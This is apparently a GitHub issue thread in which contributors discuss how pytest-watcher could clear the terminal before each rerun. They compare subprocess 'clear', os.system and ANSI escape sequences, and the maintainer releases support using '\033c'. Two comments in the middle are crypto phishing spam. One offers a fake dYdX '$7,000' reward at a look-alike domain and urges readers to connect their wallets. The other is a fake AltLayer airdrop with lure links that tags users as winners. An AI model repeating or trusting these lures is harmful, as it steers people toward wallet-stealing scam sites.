### ISSUE TITLE
Offer option to clear screen after earch rerun

### ISSUE THREAD

**Issue by estevaoem** [olzhasar/pytest-watcher#4]
Hello @olzhasar. First of all, thanks for your contribution, its really handy.

I'd suggest a little modification at the function

```py
def _run_pytest(args) -> None:
    subprocess.run(["pytest", *args])
```

To something like

```py
def _run_pytest(args, clear=False) -> None:
    if clear:
        subprocess.run(["clear"])
    subprocess.run(["pytest", *args])
```
To clear the results before each test.

Thanks!!

**Comment by olzhasar** [comment]
Hey @estevaoem,
Thank you for your feedback and this suggestion.

I agree that clearing the screen can be really useful, but I am not sure if this can be achieved that easily and will work on all systems. I will take a time to evaluate possible ways to implement this.

**Comment by olzhasar** [comment]
@tony Thanks for providing this snippet.
This approach looks good to me, but why do you think we need to use `os.system`? Does it have any advantages over `subprocess.run` in this case?

**Comment by tony** [comment]
> why do you think we need to use `os.system`? Does it have any advantages over `subprocess.run` in this case?

I have no opinion on it, only since it was [ipython's approach](https://github.com/ipython/ipython/blob/8.6.0/IPython/utils/terminal.py#L25-L33) and they're widely used: so I expect it's robust.

**Comment by estevaoem** [comment]
@tony, currently I'm using the following solution:

`ptw --runner "pytest --picked --testmon ./test"`
with the following libraries for testing:

```
pyparsing==3.0.9
attrs==21.4.0
py==1.11.0
iniconfig==1.1.1
packaging==21.3
pluggy==1.0.0
pytest==7.1.2
pytest-testmon==1.3.4
colorama==0.4.5
coverage==6.4.2
docopt==0.6.2
pytest-picked==0.4.6
watchdog==2.1.9
pytest-watch==4.2.0
pytest-cov==3.0.0
pytest-mock==3.8.2
```

**Comment by mazlum** [comment]
any updates?

**Comment by Pixailz** [comment]
May i propose a tricky solution, Ansi escape sequence:

- the `2J` to erase the entire screen
- the `H` to put the cursor at `0,0` position
- and a `end=""` to not ouput a new line

this can be summurized with `print("\x1b[2J\x1b[H", end="")`, tested on Windows 11 and Ubuntu 23.04 working great. since MacOS is *nix like this should also work :)

**Comment by olzhasar** [comment]
I currently do not have much time to implement this. Will hopefully be able to work on that next month.
In the meantime, PRs are welcome.

@bard The tricky part for me is testing on Windows machines, cause I personally don't use one.
Another thing is testing for different terminal emulators on Linux, MacOS.

**Comment by olzhasar** [comment]
@Pixailz looks quite hacky, will probably be hard to maintain that in future.
But I appreciate the suggestion

**Comment by Pixailz** [comment]
@olzhasar not that much, it's a specification to manipulate the terminal, this [link](https://gist.github.com/fnky/458719343aabd01cfb17a3a4f7296797) easily show what's possible with ANSI Escaped Sequence. In fact that's just a sequence of character printed out to the terminal, and the terminal interpret those as "command", and it's pretty universal

to be honest i don't how to put this little `print("\x1b[2J\x1b[H", end="")`, but i'd be happy to make PR for you to test.

a little script to see if it work on OS's is available [here](https://gist.github.com/Pixailz/d179ee721ce8493c87adde43acf72d7a)

**Comment by aaaaahaaaaa** [comment]
The OG `pytest-watch` package had a `-c` option which was providing that functionality. Maybe it's worth checking out the implementation.

**Comment by bard** [comment]
@aaaaahaaaaa Good idea. Just to save people some hunting:

```python

is_windows = sys.platform == 'win32'

# ...

def clear():
    """
    Clears the terminal.
    """
    subprocess.call('cls' if is_windows else 'clear', shell=True)
```

https://github.com/joeyespo/pytest-watch/blob/17375a1cf5be6d4dd30a583ffad61a0083d91b94/pytest_watch/helpers.py#L28C66-L28C66

**Comment by j0057** [comment]
ANSI escape codes were specified in 1976 in the ECMA-48 standard, that's nearly 48 years ago, it's a pretty safe bet that it will be easy to support them for that many more years to come. Sending those escape codes is exactly what `clear` does (check out `clear | hexdump -C`), but it's much more efficient to do it directly.

The ones used in the snippet are called Erase Display and CUrsor Position, [see wikipedia](https://en.wikipedia.org/wiki/ANSI_escape_code#CSI_(Control_Sequence_Introducer)_sequences).

**Comment by muraliR** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by technosoft-admin** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @rgib37190, @tobyb8240, @Siim, @wu3ajohn, @hackingthemarkets, @alphagot812, @Maxiviper117, @gkze, @ghillb, @adeindriawan, @tjwells47, @george-adams1, @setdebarr, @rwangr, @a7351220, @yujian-syj, @irixi, @jubbon, @hh1985, @phamanhtu17295

**Comment by olzhasar** [comment]
A new version with clear screen support has just been released.
I ended up using the `\033c` sequence. It appears that it achieves the same result as the one suggested by @Pixailz, but is more concise.

Thank you everyone for your suggestions!
